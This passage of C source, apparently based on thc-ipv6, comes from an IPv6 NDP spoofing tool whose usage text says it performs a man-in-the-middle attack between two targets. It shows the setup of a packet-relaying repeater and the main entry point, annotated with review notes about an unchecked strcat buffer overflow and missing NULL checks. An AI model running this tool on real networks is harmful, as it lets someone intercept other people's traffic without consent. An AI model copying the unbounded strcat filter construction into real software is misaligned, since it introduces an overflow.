 * Fills the node globals, builds a capture filter matching IPv6 traffic
 * between the two addresses in either direction, and forks a child that runs
 * thc_pcap_function() with repeater() as the callback.
 *
 * @return the child's pid in the parent (-1 if fork() failed; not checked by
 *         the caller).
 *
 * NOTE(review): the filter is assembled with strcat() into a 256-byte stack
 * buffer without any length check on nodAIp/nodBIp, each of which is appended
 * twice; snprintf() with a truncation check would bound it.
 * NOTE(review): the arguments are unsigned char * and are used both as input
 * to thc_resolve6() and as text for the filter -- confirm what representation
 * callers pass.
 * NOTE(review): a function pointer is cast to char * for thc_pcap_function().
 */
int createRepeater(unsigned char *nodAIp, unsigned char *nodAMac, unsigned char *nodBIp, unsigned char *nodBMac) {
  ownMac = resolveMAC(mArgs.ownMac);
  if (DEBUG)
    thc_dump_data(ownMac, 6, "Own mac:");
  nodeAIp = thc_resolve6(nodAIp);
  nodeAMac = resolveMAC(nodAMac);
  nodeBIp = thc_resolve6(nodBIp);
  nodeBMac = resolveMAC(nodBMac);
  int pid = 0;
  char filter[256] = "ip6 and ( ( src ";

  strcat(filter, nodAIp);
  strcat(filter, " and dst ");
  strcat(filter, nodBIp);
  strcat(filter, " ) or ( src ");
  strcat(filter, nodBIp);
  strcat(filter, " and dst ");
  strcat(filter, nodAIp);
  strcat(filter, " ) )");
  if (DEBUG)
    printf("Filter : %s \n", filter);
  if ((pid = fork()) == 0) {
    thc_pcap_function(mArgs.interface, filter, (char *) repeater, 1, NULL);
    exit(0);
  }
  return pid;
}

/**
 * Command line entry point: expects `interface target1 target2`, fills the
 * global mArgs from the thc-ipv6 lookup helpers, validates three of the
 * lookups and hands over to spoofer().
 *
 * NOTE(review): the results of thc_resolve6() are passed to thc_get_mac() and
 * thc_get_own_ipv6() before any NULL check, and mArgs.ownMac is never checked.
 * NOTE(review): twoVics is always 1, so spoofer() never returns and the
 * message and loop after the call are unreachable.
 */
int main(int argc, char *argv[]) {
  if (argc < 4) {
    printf("code by Fabricio Nogueira Buzeto and Carlos Botelho De Paula Filho\nCode based on thc-ipv6\n\n");
    printf("Syntax: %s interface target1 target2\n\n", argv[0]);
    printf("NDP spoof between target1 and target2 to perform a man-in-the-middle attack.\n");
    exit(-1);
  }

  // start from an all-zero argument block
  memset((char*)&mArgs, 0, sizeof(mArgs));
  mArgs.interface = argv[1];
  mArgs.ipAddrVic1 = thc_resolve6(argv[2]);
  mArgs.macAddrVic1 = thc_get_mac(argv[1], NULL, mArgs.ipAddrVic1);
  mArgs.ownMac = thc_get_own_mac(argv[1]);
  mArgs.ownIp = thc_get_own_ipv6(argv[1], mArgs.ipAddrVic1, PREFER_LINK);
  mArgs.twoVics = 1;
  mArgs.ipAddrVic2 = thc_resolve6(argv[3]);
  mArgs.macAddrVic2 = thc_get_mac(argv[1], NULL, mArgs.ipAddrVic2);

  if (mArgs.ownIp == NULL) {
    fprintf(stderr, "ERROR: Invalid interface: %s\n", argv[1]);
    exit(-1);
  }
  if (mArgs.macAddrVic1 == NULL) {
    fprintf(stderr, "ERROR: Invalid target1: %s\n", argv[2]);
    exit(-1);
  }
  if (mArgs.macAddrVic2 == NULL) {
    fprintf(stderr, "ERROR: Invalid target2: %s\n", argv[3]);
    exit(-1);
  }

  spoofer(mArgs);
  printf("\nPress Control-C to end MITM spoofing...\n");
  while(1)
    sleep(1);
}